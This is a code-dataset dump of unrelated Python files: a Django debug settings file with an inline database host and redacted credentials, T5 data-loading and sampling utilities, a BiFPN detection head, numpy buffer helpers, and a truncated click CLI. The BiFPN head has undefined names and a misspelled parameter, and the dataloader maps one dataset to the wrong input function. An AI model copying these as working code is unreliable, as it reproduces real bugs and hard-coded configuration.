id
stringlengths 3
8
| content
stringlengths 100
981k
|
|---|---|
64919
|
from Fusion.settings.common import *
DEBUG = True
SECRET_KEY = '=<KEY>
ALLOWED_HOSTS = []
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'fusionlab',
'HOST': '172.27.16.216',
'USER': 'fusion_admin',
'PASSWORD': '<PASSWORD>',
}
}
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
),
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
)
}
#DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'fusion.db'),
# }
#}
if DEBUG:
MIDDLEWARE += (
'debug_toolbar.middleware.DebugToolbarMiddleware',
)
INSTALLED_APPS += (
'debug_toolbar',
'django_extensions',
)
###############################
# DJANGO_EXTENSIONS SETTINGS: #
###############################
INTERNAL_IPS = [
'127.0.0.1',
]
###############################
# DJANGO_EXTENSIONS SETTINGS: #
###############################
SHELL_PLUS = "ipython"
SHELL_PLUS_PRINT_SQL = True
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
}
|
64939
|
import torch
from typing import Sequence
from torch.utils.data import (DataLoader, RandomSampler, SequentialSampler, TensorDataset)
import utils
from utils import CQAExample, SMExample, NLIExample
from utils import truncate_seq_pair, detok_batch
class T5Input:
def __init__(self, encoder_inputs, encoder_masks, decoder_inputs, decoder_masks, decoder_labels, choice_labels=None,
context_ids=None, explanation_ids=None):
self.encoder_inputs = encoder_inputs
self.encoder_masks = encoder_masks
self.decoder_inputs = decoder_inputs
self.decoder_masks = decoder_masks
self.decoder_labels = decoder_labels
self.choice_labels = choice_labels
self.context_ids = context_ids
self.explanation_ids = explanation_ids
def to_device(self, device):
for attr, value in self.__dict__.items():
if value is not None:
self.__dict__[attr] = value.to(device)
class T5Output:
def __init__(self, encoder_hidden_states, loss, decoder_logits, predictions=None, acc_sum=None, bleu=None,
choices_loss=None):
self.encoder_hidden_states = encoder_hidden_states
self.loss = loss
self.decoder_logits = decoder_logits
self.predictions = predictions
self.acc_sum = acc_sum
self.bleu = bleu
self.choices_loss = choices_loss
def make_t5_dataloader(args, tokenizer, sequential, do_test):
if args.dataset == 'sm':
read_func = utils.read_sm_examples
make_input_func = utils.read_sm_examples
elif args.dataset == 'cqa':
read_func = utils.read_cqa_examples
make_input_func = make_t5_cqa_inputs
elif args.dataset == 'nli':
read_func = utils.read_nli_examples
make_input_func = make_t5_nli_inputs
train_examples = read_func(args.train_data_file)
eval_examples = read_func(args.eval_data_file)
# small data for debugging purposes
if args.small_data > 0:
train_examples = train_examples[:args.small_data]
eval_examples = eval_examples[:args.small_data]
# convert examples to lists of tensors, and put into TensorDatasets then dataloaders.
# use_explanations is flag for excluded explanations in inputs
train_tensors = make_input_func(args, tokenizer, train_examples)
train_data = TensorDataset(*train_tensors)
train_sampler = RandomSampler(train_data) if not sequential else SequentialSampler(train_data)
train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size,
num_workers=4, pin_memory=True)
eval_tensors = make_input_func(args, tokenizer, eval_examples)
eval_data = TensorDataset(*eval_tensors)
eval_sampler = SequentialSampler(eval_data)
eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size,
num_workers=4, pin_memory=True)
test_dataloader = None
if do_test:
test_examples = read_func(args.test_data_file)
if args.small_data > 0:
test_examples = test_examples[:args.small_data]
test_tensors = make_input_func(args, tokenizer, test_examples)
test_data = TensorDataset(*test_tensors)
test_sampler = SequentialSampler(test_data)
test_dataloader = DataLoader(test_data, sampler=test_sampler, batch_size=args.eval_batch_size,
num_workers=4, pin_memory=True)
return train_dataloader, eval_dataloader, test_dataloader
def make_t5_sm_inputs(args, tokenizer, examples):
qa_encoder_input_strs = []
qa_decoder_answer_input_strs = []
qa_decoder_answer_label_strs = []
qa_decoder_choices_input_strs = []
qa_decoder_choices_label_strs = []
exp_encoder_input_strs = []
exp_decoder_input_strs = []
exp_decoder_label_strs = []
exp_context_strs = []
exp_explanation_strs = []
for idx, example in enumerate(examples):
qa_prefix = 'task: '
exp_prefix = 'explain: '
question_str = f'{example.statements[0]} [SEP] {example.statements[1]}'
if args.label_to_use == 't5':
answer_str = example.statements[int(example.input_dict['t5_prediction'])]
else:
answer_str = example.statements[example.statement_label]
if args.explanation_to_use == 't5':
explanation_str = example.input_dict['t5_explanation']
else:
explanation_str = example.human_explanation
if not args.condition_on_explanation:
qa_input_str = f'[CLS] {question_str} [SEP]'
else:
qa_input_str = f'[CLS] {question_str} [SEP] {explanation_str}'
exp_input_str = f'[CLS] {question_str} [SEP]'
qa_encoder_input_str = qa_prefix + qa_input_str
qa_decoder_answer_input_str = f'The answer is: {answer_str}'
qa_decoder_answer_label_str = qa_decoder_answer_input_str
qa_decoder_choices_input_str = [f'The answer is: {statement}' for statement in example.statements]
qa_decoder_choices_label_str = qa_decoder_choices_input_str
exp_encoder_input_str = exp_prefix + exp_input_str
exp_decoder_input_str = f'My common sense tells me {explanation_str}'
exp_decoder_label_str = exp_decoder_input_str
exp_context_str = ['My common sense tells me ' for statement in example.statements]
exp_explanation_str = explanation_str
qa_encoder_input_strs.append(qa_encoder_input_str)
qa_decoder_answer_input_strs.append(qa_decoder_answer_input_str)
qa_decoder_answer_label_strs.append(qa_decoder_answer_label_str)
qa_decoder_choices_input_strs.append(qa_decoder_choices_input_str)
qa_decoder_choices_label_strs.append(qa_decoder_choices_label_str)
exp_encoder_input_strs.append(exp_encoder_input_str)
exp_decoder_input_strs.append(exp_decoder_input_str)
exp_decoder_label_strs.append(exp_decoder_label_str)
exp_context_strs.append(exp_context_str)
exp_explanation_strs.append(exp_explanation_str)
input_padding_id = tokenizer.pad_token_id
label_padding_id = -100
qa_encoder_inputs, qa_encoder_masks = make_t5_tensor(tokenizer, qa_encoder_input_strs, input_padding_id,
args.max_seq_len, add_eos=False, make_mask=True)
qa_decoder_answer_inputs, qa_decoder_answer_masks = make_t5_tensor(tokenizer, qa_decoder_answer_input_strs,
input_padding_id,
args.max_seq_len, add_eos=False,
make_mask=True)
qa_decoder_answer_labels = make_t5_tensor(tokenizer, qa_decoder_answer_label_strs, label_padding_id,
args.max_seq_len, add_eos=False, make_mask=False)
qa_decoder_choices_inputs, qa_decoder_choices_masks = make_t5_tensor(tokenizer, qa_decoder_choices_input_strs,
input_padding_id,
args.max_seq_len, add_eos=False,
make_mask=True)
qa_decoder_choices_labels = make_t5_tensor(tokenizer, qa_decoder_choices_label_strs, label_padding_id,
args.max_seq_len, add_eos=False, make_mask=False)
if args.label_to_use == 't5':
qa_choice_label_list = [int(example.input_dict['t5_prediction']) for example in examples]
else:
qa_choice_label_list = [example.statement_label for example in examples]
qa_choice_labels = torch.tensor(qa_choice_label_list, dtype=torch.long)
exp_encoder_inputs, exp_encoder_masks = make_t5_tensor(tokenizer, exp_encoder_input_strs,
input_padding_id, args.max_seq_len, add_eos=False,
make_mask=True)
exp_decoder_inputs, exp_decoder_masks = make_t5_tensor(tokenizer, exp_decoder_input_strs,
input_padding_id, args.max_seq_len, add_eos=True,
make_mask=True)
exp_decoder_labels = make_t5_tensor(tokenizer, exp_decoder_label_strs, label_padding_id, args.max_seq_len,
add_eos=True, make_mask=False)
exp_context_ids = make_t5_tensor(tokenizer, exp_context_strs, input_padding_id, args.max_seq_len,
add_eos=False, make_mask=False)
exp_explanation_ids = make_t5_tensor(tokenizer, exp_explanation_strs, input_padding_id, args.max_seq_len,
add_eos=True, make_mask=False)
return [qa_encoder_inputs, qa_encoder_masks,
qa_decoder_answer_inputs, qa_decoder_answer_masks, qa_decoder_answer_labels,
qa_decoder_choices_inputs, qa_decoder_choices_masks, qa_decoder_choices_labels,
qa_choice_labels,
exp_encoder_inputs, exp_encoder_masks,
exp_decoder_inputs, exp_decoder_masks, exp_decoder_labels,
exp_context_ids, exp_explanation_ids]
def make_t5_cqa_inputs(args, tokenizer, examples: Sequence[CQAExample]):
qa_encoder_input_strs = []
qa_decoder_answer_input_strs = []
qa_decoder_answer_label_strs = []
qa_decoder_choices_input_strs = []
qa_decoder_choices_label_strs = []
exp_encoder_input_strs = []
exp_decoder_input_strs = []
exp_decoder_label_strs = []
exp_context_strs = []
exp_explanation_strs = []
qa_encoder_x_masks = [] # e masked as 0
qa_encoder_e_masks = [] # x masked as 0
for idx, example in enumerate(examples):
question_str = f'{example.question}'
choices_str = f'The choices are {example.choices[0]}, {example.choices[1]} and {example.choices[2]}'
# truncate question str if necessary
question_str = truncate_question_str(args, tokenizer, question_str, choices_str)
if args.label_to_use == 't5':
answer_str = example.choices[int(example.input_dict['t5_prediction'])]
else:
answer_str = example.choices[example.label] if example.label >= 0 else ''
if args.explanation_to_use == 't5':
explanation_str = example.input_dict['t5_explanation']
else:
explanation_str = example.human_explanation
if args.explanation_only:
qa_encoder_input_str = f'task: [CLS] {choices_str} [SEP] My commonsense tells me {explanation_str}'
elif args.condition_on_explanation:
qa_encoder_input_str = f'task: [CLS] {question_str} {choices_str} [SEP] My commonsense tells me {explanation_str}'
else:
qa_encoder_input_str = f'task: [CLS] {question_str} {choices_str} [SEP]'
exp_encoder_input_str = f'explain: [CLS] {question_str} {choices_str} [SEP]'
# x,e masks
x_len = len(tokenizer.encode(f'task: [CLS] {question_str} {choices_str} [SEP] '))
qa_encoder_x_mask = [1] * x_len + [0] * (args.max_seq_len - x_len)
qa_encoder_x_masks.append(qa_encoder_x_mask)
start_len = len(tokenizer.encode('task: [CLS] '))
que_len = len(tokenizer.encode(f'task: [CLS] {question_str} '))
qa_encoder_e_mask = [1] * start_len + [0] * (que_len - start_len) + [1] * (args.max_seq_len - que_len)
qa_encoder_e_masks.append(qa_encoder_e_mask)
qa_decoder_answer_input_str = f'The answer is: {answer_str}'
qa_decoder_answer_label_str = qa_decoder_answer_input_str
qa_decoder_choices_input_str = [f'The answer is: {choice}' for choice in example.choices]
qa_decoder_choices_label_str = qa_decoder_choices_input_str
exp_decoder_input_str = f'My commonsense tells me {explanation_str}'
exp_decoder_label_str = exp_decoder_input_str
if args.rationalize:
exp_context_str = [f'The answer is {choice} because ' for choice in example.choices]
else:
exp_context_str = ['My commonsense tells me ' for choice in example.choices]
exp_explanation_str = explanation_str
qa_encoder_input_strs.append(qa_encoder_input_str)
qa_decoder_answer_input_strs.append(qa_decoder_answer_input_str)
qa_decoder_answer_label_strs.append(qa_decoder_answer_label_str)
qa_decoder_choices_input_strs.append(qa_decoder_choices_input_str)
qa_decoder_choices_label_strs.append(qa_decoder_choices_label_str)
exp_encoder_input_strs.append(exp_encoder_input_str)
exp_decoder_input_strs.append(exp_decoder_input_str)
exp_decoder_label_strs.append(exp_decoder_label_str)
exp_context_strs.append(exp_context_str)
exp_explanation_strs.append(exp_explanation_str)
qa_encoder_x_masks = torch.tensor(qa_encoder_x_masks, dtype=torch.long)
qa_encoder_e_masks = torch.tensor(qa_encoder_e_masks, dtype=torch.long)
input_padding_id = tokenizer.pad_token_id
label_padding_id = -100
qa_encoder_inputs, qa_encoder_masks = make_t5_tensor(tokenizer, qa_encoder_input_strs, input_padding_id,
args.max_seq_len, add_eos=False, make_mask=True)
qa_decoder_answer_inputs, qa_decoder_answer_masks = make_t5_tensor(tokenizer, qa_decoder_answer_input_strs,
input_padding_id,
args.max_seq_len, add_eos=False,
make_mask=True)
qa_decoder_answer_labels = make_t5_tensor(tokenizer, qa_decoder_answer_label_strs, label_padding_id,
args.max_seq_len, add_eos=False, make_mask=False)
qa_decoder_choices_inputs, qa_decoder_choices_masks = make_t5_tensor(tokenizer, qa_decoder_choices_input_strs,
input_padding_id,
args.max_seq_len, add_eos=False,
make_mask=True)
qa_decoder_choices_labels = make_t5_tensor(tokenizer, qa_decoder_choices_label_strs, label_padding_id,
args.max_seq_len, add_eos=False, make_mask=False)
if args.label_to_use == 't5':
qa_choice_label_list = [int(example.input_dict['t5_prediction']) for example in examples]
else:
qa_choice_label_list = [example.label for example in examples]
qa_choice_labels = torch.tensor(qa_choice_label_list, dtype=torch.long)
exp_encoder_inputs, exp_encoder_masks = make_t5_tensor(tokenizer, exp_encoder_input_strs,
input_padding_id, args.max_seq_len, add_eos=False,
make_mask=True)
exp_decoder_inputs, exp_decoder_masks = make_t5_tensor(tokenizer, exp_decoder_input_strs,
input_padding_id, args.max_seq_len, add_eos=True,
make_mask=True)
exp_decoder_labels = make_t5_tensor(tokenizer, exp_decoder_label_strs, label_padding_id, args.max_seq_len,
add_eos=True, make_mask=False)
exp_context_ids = make_t5_tensor(tokenizer, exp_context_strs, input_padding_id, args.max_seq_len,
add_eos=False, make_mask=False)
exp_explanation_ids = make_t5_tensor(tokenizer, exp_explanation_strs, input_padding_id, args.max_seq_len,
add_eos=True, make_mask=False)
return [qa_encoder_inputs, qa_encoder_masks, qa_encoder_x_masks, qa_encoder_e_masks,
qa_decoder_answer_inputs, qa_decoder_answer_masks, qa_decoder_answer_labels,
qa_decoder_choices_inputs, qa_decoder_choices_masks, qa_decoder_choices_labels,
qa_choice_labels,
exp_encoder_inputs, exp_encoder_masks,
exp_decoder_inputs, exp_decoder_masks, exp_decoder_labels,
exp_context_ids, exp_explanation_ids]
def make_t5_nli_inputs(args, tokenizer, examples: Sequence[NLIExample]):
qa_encoder_input_strs = []
qa_decoder_answer_input_strs = []
qa_decoder_answer_label_strs = []
qa_decoder_choices_input_strs = []
qa_decoder_choices_label_strs = []
exp_encoder_input_strs = []
exp_decoder_input_strs = []
exp_decoder_label_strs = []
exp_context_strs = []
exp_explanation_strs = []
for idx, example in enumerate(examples):
premise_str = example.premise
hypothesis_str = example.hypothesis
if args.label_to_use == 't5':
answer_str = example.choices[int(example.input_dict['t5_prediction'])]
else:
answer_str = example.choices[int(example.label)]
if args.explanation_to_use == 't5':
explanation_str = example.input_dict['t5_explanation']
else:
explanation_str = example.human_explanation
qa_encoder_input_str = f'task: nli premise: [CLS] {premise_str} [SEP] hypothesis: {hypothesis_str} [SEP]'
if args.condition_on_explanation:
qa_encoder_input_str = f'{qa_encoder_input_str} My commonsense tells me {explanation_str}'
exp_encoder_input_str = f'explain: nli premise: [CLS] {premise_str} [SEP] hypothesis: {hypothesis_str} [SEP]'
qa_decoder_answer_input_str = f'answer {answer_str}'
qa_decoder_answer_label_str = qa_decoder_answer_input_str
qa_decoder_choices_input_str = [f'answer {choice}' for choice in example.choices]
qa_decoder_choices_label_str = qa_decoder_choices_input_str
exp_decoder_input_str = f'My commonsense tells me {explanation_str}'
exp_decoder_label_str = exp_decoder_input_str
exp_context_str = ['My commonsense tells me ' for choice in example.choices]
exp_explanation_str = explanation_str
qa_encoder_input_strs.append(qa_encoder_input_str)
qa_decoder_answer_input_strs.append(qa_decoder_answer_input_str)
qa_decoder_answer_label_strs.append(qa_decoder_answer_label_str)
qa_decoder_choices_input_strs.append(qa_decoder_choices_input_str)
qa_decoder_choices_label_strs.append(qa_decoder_choices_label_str)
exp_encoder_input_strs.append(exp_encoder_input_str)
exp_decoder_input_strs.append(exp_decoder_input_str)
exp_decoder_label_strs.append(exp_decoder_label_str)
exp_context_strs.append(exp_context_str)
exp_explanation_strs.append(exp_explanation_str)
input_padding_id = tokenizer.pad_token_id
label_padding_id = -100
qa_encoder_inputs, qa_encoder_masks = make_t5_tensor(tokenizer, qa_encoder_input_strs, input_padding_id,
args.max_seq_len, add_eos=False, make_mask=True)
qa_decoder_answer_inputs, qa_decoder_answer_masks = make_t5_tensor(tokenizer, qa_decoder_answer_input_strs,
input_padding_id,
args.max_seq_len, add_eos=False,
make_mask=True)
qa_decoder_answer_labels = make_t5_tensor(tokenizer, qa_decoder_answer_label_strs, label_padding_id,
args.max_seq_len, add_eos=False, make_mask=False)
qa_decoder_choices_inputs, qa_decoder_choices_masks = make_t5_tensor(tokenizer, qa_decoder_choices_input_strs,
input_padding_id,
args.max_seq_len, add_eos=False,
make_mask=True)
qa_decoder_choices_labels = make_t5_tensor(tokenizer, qa_decoder_choices_label_strs, label_padding_id,
args.max_seq_len, add_eos=False, make_mask=False)
if args.label_to_use == 't5':
qa_choice_label_list = [int(example.input_dict['t5_prediction']) for example in examples]
else:
qa_choice_label_list = [example.label for example in examples]
qa_choice_labels = torch.tensor(qa_choice_label_list, dtype=torch.long)
exp_encoder_inputs, exp_encoder_masks = make_t5_tensor(tokenizer, exp_encoder_input_strs,
input_padding_id, args.max_seq_len, add_eos=False,
make_mask=True)
exp_decoder_inputs, exp_decoder_masks = make_t5_tensor(tokenizer, exp_decoder_input_strs,
input_padding_id, args.max_seq_len, add_eos=True,
make_mask=True)
exp_decoder_labels = make_t5_tensor(tokenizer, exp_decoder_label_strs, label_padding_id, args.max_seq_len,
add_eos=True, make_mask=False)
exp_context_ids = make_t5_tensor(tokenizer, exp_context_strs, input_padding_id, args.max_seq_len,
add_eos=False, make_mask=False)
exp_explanation_ids = make_t5_tensor(tokenizer, exp_explanation_strs, input_padding_id, args.max_seq_len,
add_eos=True, make_mask=False)
return [qa_encoder_inputs, qa_encoder_masks,
qa_decoder_answer_inputs, qa_decoder_answer_masks, qa_decoder_answer_labels,
qa_decoder_choices_inputs, qa_decoder_choices_masks, qa_decoder_choices_labels,
qa_choice_labels,
exp_encoder_inputs, exp_encoder_masks,
exp_decoder_inputs, exp_decoder_masks, exp_decoder_labels,
exp_context_ids, exp_explanation_ids]
def make_t5_tensor(tokenizer, input_strs, pad_token_id, max_seq_len, add_eos: bool, make_mask: bool):
all_input_ids = []
for input_str in input_strs:
if isinstance(input_str, str):
input_ids = tokenizer.convert_tokens_to_ids(tokenizer.tokenize(input_str))
input_ids += [tokenizer.eos_token_id] if add_eos else []
truncate_seq_pair(input_ids, [], max_seq_len)
input_ids += [pad_token_id] * (max_seq_len - len(input_ids)) # padding
all_input_ids.append(input_ids)
else:
input_ids = []
for choice_str in input_str:
choice_ids = tokenizer.convert_tokens_to_ids(tokenizer.tokenize(choice_str))
choice_ids += [tokenizer.eos_token_id] if add_eos else []
truncate_seq_pair(choice_ids, [], max_seq_len)
choice_ids += [pad_token_id] * (max_seq_len - len(choice_ids)) # padding
input_ids.append(choice_ids)
all_input_ids.append(input_ids)
tensor = torch.tensor(all_input_ids, dtype=torch.long)
if make_mask:
mask = (tensor != pad_token_id).float()
return tensor, mask
else:
return tensor
def truncate_question_str(args, tokenizer, question_str, choices_str):
initial_len = len(tokenizer.encode(f'[CLS] {question_str} {choices_str} [SEP]'))
exp_len = len(tokenizer.encode('My commonsense tells me ')) + args.max_sample_len
prefix_len = len(tokenizer.encode('task: '))
cap_len = args.max_seq_len - exp_len - prefix_len
if initial_len > cap_len:
over_by = initial_len - cap_len
question_tokens = tokenizer.encode(question_str)
keep_up_to = len(question_tokens) - over_by - 1
new_question_tokens = question_tokens[:keep_up_to]
question_str = tokenizer.decode(new_question_tokens) + '?'
return question_str
def print_t5_input(args, tokenizer, input: T5Input, msg='T5Input'):
ignore_tokens_list = [tokenizer.pad_token, '[UNK]']
encoder_input_strs = detok_batch(tokenizer, input.encoder_inputs, ignore_tokens=ignore_tokens_list,
eos_token=tokenizer.eos_token)
decoder_input_strs = detok_batch(tokenizer, input.decoder_inputs, ignore_tokens=ignore_tokens_list,
eos_token=tokenizer.eos_token)
decoder_label_strs = detok_batch(tokenizer, input.decoder_labels, ignore_tokens=ignore_tokens_list,
eos_token=tokenizer.eos_token)
print(f'\n----{msg}----\n')
print(f'encoder_input_strs: {encoder_input_strs}')
print(f'encoder_inputs[0]: {input.encoder_inputs[0]}')
print(f'encoder_masks[0]: {input.encoder_masks[0]}')
print(f'decoder_input_strs: {decoder_input_strs}')
print(f'decoder_label_strs: {decoder_label_strs}')
if args.verbose:
print(f'decoder_inputs[0]: {input.decoder_inputs[0]}')
print(f'decoder_masks[0]: {input.decoder_masks[0]}')
print(f'decoder_labels[0]: {input.decoder_labels[0]}')
if input.choice_labels is not None:
print(f'choice_labels: {input.choice_labels}')
if input.context_ids is not None:
context_strs = detok_batch(tokenizer, input.context_ids, ignore_tokens=ignore_tokens_list,
eos_token=tokenizer.eos_token)
if args.verbose:
print(f'context_ids[0]: {input.context_ids[0]}')
print(f'context_strs: {context_strs}')
if input.explanation_ids is not None:
explanation_strs = detok_batch(tokenizer, input.explanation_ids, ignore_tokens=ignore_tokens_list,
eos_token=tokenizer.eos_token)
if args.verbose:
print(f'explanation_ids[0]: {input.explanation_ids[0]}')
print(f'explanation_strs: {explanation_strs}')
print('')
def print_t5_output(args, tokenizer, output: T5Output, msg='T5Output'):
ignore_tokens_list = [tokenizer.pad_token]
print(f'\n----{msg}----\n')
print(f'encoder_hidden_states.size(): {output.encoder_hidden_states.size()}')
if args.verbose:
print(f'encoder_hidden_states: {output.encoder_hidden_states}')
print(f'loss.size(): {output.loss.size()}')
print(f'loss: {output.loss}')
if output.choices_loss is not None:
print(f'choices_loss: {output.choices_loss}')
if output.predictions is not None: # predictions can be either (batch_size, 1) or (batch_size, max_seq_len)
if isinstance(output.predictions[0], list):
prediction_strs = detok_batch(tokenizer, output.predictions, ignore_tokens=ignore_tokens_list,
eos_token=tokenizer.eos_token)
if args.verbose:
print(f'prediction_ids[0]: {output.predictions[0]}')
print(f'prediction_strs: {prediction_strs}')
else:
print(f'predictions: {output.predictions}')
if output.acc_sum is not None:
print(f'accuracy_sum: {output.acc_sum}')
if output.bleu is not None:
print(f'bleu: {output.bleu}')
print('')
def sample_batched(model, context_ids, tokenizer, max_sample_len, model_name='T5',
input_ids=None, input_masks=None, encoder_hidden_states=None,
sampling_strategy='argmax', pad_prefix=True):
'''
Uses model to sample based on context_ids, until max_sample_len is hit, with the expectation that decoding will stop at a specified [end] token
This function is batched, meaning predictions are placed at the end of each running sequence within a tensor of shape (batch_size x num_choices x max_seq_len)
Before returning samples, the original contexts in running_contexts are set to the pad_token_id
'''
batch_size = context_ids.size(0)
num_choices = context_ids.size(1)
vocab_size = len(tokenizer) # NOT tokenizer.vocab_size, this attr does not update when tokens are added
pad_token_id = tokenizer.pad_token_id if tokenizer.pad_token_id is not None else 0
running_contexts = context_ids.clone()
device = context_ids.device
if model_name == 'T5':
if encoder_hidden_states is None:
encoder_outputs = model(input_ids=input_ids,
attention_mask=input_masks)
encoder_hidden_states = encoder_outputs[1]
if input_masks.shape != context_ids.shape:
input_masks = input_masks.unsqueeze(1).expand_as(context_ids)
expand_shape = list(encoder_hidden_states.shape)
expand_shape.insert(1, context_ids.size(1))
encoder_hidden_states = encoder_hidden_states.unsqueeze(1).expand(expand_shape)
# flatten for T5.forward
batch_size_by_num_choices = list(encoder_hidden_states.shape[:2])
seq_len = encoder_hidden_states.size(2)
embed_dim = encoder_hidden_states.size(3)
encoder_hidden_states = encoder_hidden_states.reshape(-1, seq_len, embed_dim)
input_masks = input_masks.reshape(-1, seq_len)
# BEGIN SAMPLING
for k in range(max_sample_len):
attention_mask = (running_contexts != pad_token_id).float()
# get locations of last non-pad tokens in each sequence for purposes of: getting predictions from logits, and updating running_contexts
# print(running_contexts)
where_last_tokens = [[question[choice_id].index(pad_token_id) - 1 for choice_id in range(num_choices)] for
question in running_contexts.tolist()]
mask = torch.zeros(batch_size, num_choices, context_ids.size(2), vocab_size)
mask = mask.to(device).float()
for i in range(running_contexts.size(0)):
for j in range(num_choices):
last_token_index = where_last_tokens[i][j]
mask[i, j, last_token_index, :] = 1
# hold onto the starting point of sampling for each context
if k == 0: init_where_last_tokens = where_last_tokens
with torch.no_grad():
if 'gpt' in model_name:
outputs = model(running_contexts, attention_mask=attention_mask)
elif 'T5' == model_name:
running_contexts = running_contexts.view(-1, seq_len)
attention_mask = attention_mask.view(-1, seq_len)
outputs = model(encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=input_masks,
decoder_input_ids=running_contexts,
decoder_attention_mask=attention_mask)
logits = outputs[0]
# unflatten for T5
if 'T5' == model_name:
running_contexts = running_contexts.view(batch_size, num_choices, seq_len)
logits = logits.view(batch_size, num_choices, seq_len, vocab_size)
# get logits corresponding to last tokens in each sequence
logits = logits * mask
logits = torch.sum(logits, dim=2) # (batch_size, num_choices, vocab_size)
if sampling_strategy == 'argmax':
preds = torch.argmax(logits, dim=-1)
else:
probs = torch.nn.functional.softmax(logits.squeeze(1), dim=1) # (batch_size, vocab_size)
preds = torch.multinomial(probs, num_samples=1)
# assign preds to the first pad location in each running_contexts[i,j,:] sequence
for i in range(batch_size):
for j in range(num_choices):
last_token_index = where_last_tokens[i][j]
running_contexts[i, j, last_token_index + 1] = preds[i, j].item()
samples = running_contexts
if pad_prefix:
for i in range(batch_size):
for j in range(num_choices):
end_of_context_index = init_where_last_tokens[i][j]
samples[i, j, :(end_of_context_index + 1)] = pad_token_id
return samples
def sample(device, model, prompts, encoder_hidden_states, input_masks, max_seq_length, tokenizer, decoder_masks=None,
sampling_strategy='argmax'):
if decoder_masks is None:
decoder_masks = (prompts!=tokenizer.pad_token_id).int()
context_lens = decoder_masks.sum(dim=-1)
batch_size, num_choices, seq_len = list(decoder_masks.shape)
finished = torch.zeros(batch_size, num_choices, dtype=torch.int32).to(device)
vocab_size = len(tokenizer)
while finished.sum().item() != batch_size*num_choices and decoder_masks.sum().item() != batch_size * num_choices * max_seq_length:
prompts = prompts.view(-1, seq_len)
input_masks = input_masks.view(-1, seq_len)
with torch.no_grad():
outputs = model(encoder_hidden_states = encoder_hidden_states,
encoder_attention_mask = input_masks,
decoder_input_ids = prompts,
decoder_attention_mask = decoder_masks)
logits = outputs[0]
prompts = prompts.view(batch_size, num_choices, seq_len)
logits = logits.view(batch_size, num_choices, seq_len, vocab_size)
if sampling_strategy == 'argmax':
pred = torch.argmax(logits, dim=-1)
elif sampling_strategy == 'multinomial':
prob = torch.nn.functional.softmax(logits, dim=-1).view(-1, vocab_size)
pred = torch.multinomial(prob, num_samples=1).view(batch_size, num_choices, seq_len)
pred = torch.cat((torch.zeros((batch_size, num_choices, 1), dtype=torch.long).to(device), pred[..., :-1]), dim=2)
prompts = decoder_masks * prompts + (1 - decoder_masks) * pred
new_masks = torch.cat((torch.ones((batch_size, num_choices, 1), dtype=torch.int32).to(device), decoder_masks[..., :-1]), dim=2)
new_tokens = (1 - decoder_masks) * new_masks * prompts
finished += (torch.ones(batch_size, num_choices, dtype=torch.int32).to(device) - finished) * \
(new_tokens.sum(dim=2) == tokenizer.eos_token_id).int()
decoder_masks = new_masks
return prompts
|
64943
|
from aw_nas.weights_manager.wrapper import BaseHead
from .classifiers import BiFPNClassifier
__all__ = ["BiFPNHead"]
class BiFPNHead(BaseHead):
NAME = "bifpn_head"
def __init__(
self,
device,
num_classes,
feature_channels,
bifpn_out_channels,
activation="swish",
num_layers=4,
has_backgroud=True,
schedule_cfg=None,
):
super(BiFPNHeader).__init__(schedule_cfg)
self.num_classes = num_classes
num_anchors = 9
self.reg = BiFPNClassifier(
bifpn_out_channels, num_anchors, 4, num_layers, activation
)
self.cls = BiFPNClassifier(
bifpn_out_channels,
num_anchors,
num_classes + int(has_background),
num_layers,
activation,
)
self.device = device
self.pretrained_path = pretrained_path
def forward(self, features):
return self.cls(features), self.reg(features)
|
64954
|
from typing import Dict
import numpy as np
def buffer_from_example(example: Dict[str, np.ndarray],
leading_dims) -> Dict[str, np.ndarray]:
buf = {}
for key, value in example.items():
buf[key] = np.zeros(leading_dims + value.shape, dtype=value.dtype)
return buf
def get_leading_dims(dictionary, n_dims=1):
values = iter(dictionary.values())
leading_dims = next(values).shape[:n_dims]
if not all(leading_dims == value.shape[:n_dims] for value in values):
key, shape = [(key, value.shape[:n_dims])
for key, value in dictionary.items()
if leading_dims != value.shape[:n_dims]][0]
raise ValueError((f'Dimensions do not match: {leading_dims} vs. '
f'{shape} (for key `{key}`)'))
return leading_dims
|
64981
|
from copy import deepcopy
from dataclasses import dataclass, asdict
from logging import getLogger, WARNING
import anyconfig
import click
import sys
from pathlib import Path
from typing import List, Tuple
from .command import CwsMultiCommands
from .error import CwsClientError
from ..config import DEFAULT_PROJECT_DIR, DEFAULT_WORKSPACE
from ..utils import import_attr, get_system_info
from ..version import __version__
PROJECT_CONFIG_VERSION = 2
@click.group()
@click.version_option(version=__version__, message=f'%(prog)s %(version)s, {get_system_info()}')
@click.option('-p', '--project-dir', default=DEFAULT_PROJECT_DIR,
help=f"The project directory path (absolute or relative) [default to '{DEFAULT_PROJECT_DIR}'].")
@click.option('-c', '--config-file', help="Configuration file path [path from project dir].")
@click.option('-m', '--module', help="Filename of your microservice python source file.")
@click.option('-s', '--service', help="Microservice variable name in the source file.")
@click.option('-w', '--workspace', default=DEFAULT_WORKSPACE,
help=f"Application stage [default to '{DEFAULT_WORKSPACE}'].")
@click.pass_context
def client(*args, **kwargs):
...
def invoke(ctx):
"""Invokes the command over the service or the declared services in project configuration file."""
try:
args = ctx.args
protected_args = ctx.protected_args
if not protected_args:
sys.stderr.write(str("No command given.\n"))
client.main(['--help'])
sys.exit(1)
command_name = protected_args[0]
# get project options
cws_options = CwsClientOptions(ctx.params)
if not cws_options.services:
sys.stderr.write(str("Nothing to execute as no service defined.\n"))
sys.exit(1)
project_dir = cws_options.project_dir
workspace = cws_options.workspace
# Iterates over the declared services in project configuration file
commands_to_be_executed = CwsMultiCommands()
for module, service in cws_options.services:
ctx.args = list(args)
ctx.protected_args = protected_args
# Get command from the microservice description
handler = cws_options.get_handler(module, service)
handler.deferred_init(workspace)
service_config = cws_options.get_service_config(module, service)
command = service_config.get_command(command_name, handler)
if not command:
raise CwsClientError(f"Undefined command {command_name}.\n")
command_options = service_config.get_command_options(command_name)
# Get user defined options and convert them in right types
